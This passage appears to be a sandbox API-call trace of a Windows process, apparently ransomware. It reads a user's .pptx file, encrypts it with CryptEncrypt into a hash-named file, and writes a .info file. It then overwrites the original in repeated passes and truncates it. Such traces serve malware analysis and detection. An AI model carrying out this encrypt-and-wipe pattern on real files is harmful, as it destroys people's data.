(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.351] GetFileType (hFile=0x36c) returned 0x1 [0072.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0072.351] GetFileType (hFile=0x36c) returned 0x1 [0072.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", lpFilePart=0x0) returned 0x48 [0072.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0072.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6a9fae0d0394dbfdfc46f21b313726cf"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0072.351] GetFileType (hFile=0x380) returned 0x1 [0072.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0072.351] GetFileType (hFile=0x380) returned 0x1 [0072.352] ReadFile (in: hFile=0x36c, lpBuffer=0x237f0b0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x237f0b0*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0072.355] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23930c8*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x23930c8*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0072.355] WriteFile (in: hFile=0x380, lpBuffer=0x23930c8*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x23930c8*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0072.357] ReadFile (in: hFile=0x36c, lpBuffer=0x237f0b0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x237f0b0*, lpNumberOfBytesRead=0x1bf5da28*=0x10e, lpOverlapped=0x0) returned 1 [0072.357] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23a7108*, pdwDataLen=0x1bf5da80*=0x100, dwBufLen=0x100 | out: pbData=0x23a7108*, pdwDataLen=0x1bf5da80*=0x100) returned 1 [0072.357] ReadFile (in: hFile=0x36c, lpBuffer=0x237f0b0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x237f0b0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0072.357] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23a8260*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x23a8260*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0072.358] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23a82b0*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x23a82b0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0072.358] WriteFile (in: hFile=0x380, lpBuffer=0x23a7248*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x23a7248*, lpNumberOfBytesWritten=0x1bf5d948*=0x110, lpOverlapped=0x0) returned 1 [0072.358] CloseHandle (hObject=0x380) returned 1 [0072.359] CloseHandle (hObject=0x36c) returned 1 [0072.359] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0072.359] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0072.359] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0072.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF", lpFilePart=0x0) returned 0x48 [0072.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0072.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6a9fae0d0394dbfdfc46f21b313726cf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.360] GetFileType (hFile=0x36c) returned 0x1 [0072.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0072.360] GetFileType (hFile=0x36c) returned 0x1 [0072.360] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.361] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.362] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.363] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.364] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.364] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.364] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.364] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.366] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.366] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.366] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0072.366] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x110, lpOverlapped=0x0) returned 1 [0072.366] ReadFile (in: hFile=0x36c, lpBuffer=0x23a89e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x23a89e0*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0072.366] CloseHandle (hObject=0x36c) returned 1 [0072.390] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF.info", lpFilePart=0x0) returned 0x4d [0072.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0072.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6A9FAE0D0394DBFDFC46F21B313726CF.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6a9fae0d0394dbfdfc46f21b313726cf.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.390] GetFileType (hFile=0x36c) returned 0x1 [0072.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0072.391] GetFileType (hFile=0x36c) returned 0x1 [0072.391] WriteFile (in: hFile=0x36c, lpBuffer=0x23b50a0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x23b50a0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0072.392] CloseHandle (hObject=0x36c) returned 1 [0072.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0072.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0d6460, ftCreationTime.dwHighDateTime=0x1d4b58a, ftLastAccessTime.dwLowDateTime=0x5cbdce10, ftLastAccessTime.dwHighDateTime=0x1d50f9e, ftLastWriteTime.dwLowDateTime=0x5cbdce10, ftLastWriteTime.dwHighDateTime=0x1d50f9e, nFileSizeHigh=0x0, nFileSizeLow=0x1410e)) returned 1 [0072.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0072.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.393] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", dwFileAttributes=0x80) returned 1 [0072.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0072.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23bcc98 | out: lpFileInformation=0x23bcc98*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe0d6460, ftCreationTime.dwHighDateTime=0x1d4b58a, ftLastAccessTime.dwLowDateTime=0x5cbdce10, ftLastAccessTime.dwHighDateTime=0x1d50f9e, ftLastWriteTime.dwLowDateTime=0x5cbdce10, ftLastWriteTime.dwHighDateTime=0x1d50f9e, nFileSizeHigh=0x0, nFileSizeLow=0x1410e)) returned 1 [0072.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0072.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0072.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4rrbngpzmixp3k.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.394] GetFileType (hFile=0x36c) returned 0x1 [0072.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0072.394] GetFileType (hFile=0x36c) returned 0x1 [0072.394] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.395] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.395] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.396] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.397] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.398] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.398] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.399] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.400] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.401] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.401] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.402] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.403] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.404] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.404] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.405] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.406] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.406] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.407] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.408] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.409] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.409] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0072.409] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.410] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.411] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.411] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.412] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.413] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.414] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.414] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.415] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.416] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.417] WriteFile (in: hFile=0x36c, lpBuffer=0x23bd140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x23bd140*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.418] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.419] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.419] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.419] SetEndOfFile (hFile=0x36c) returned 1 [0072.420] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: 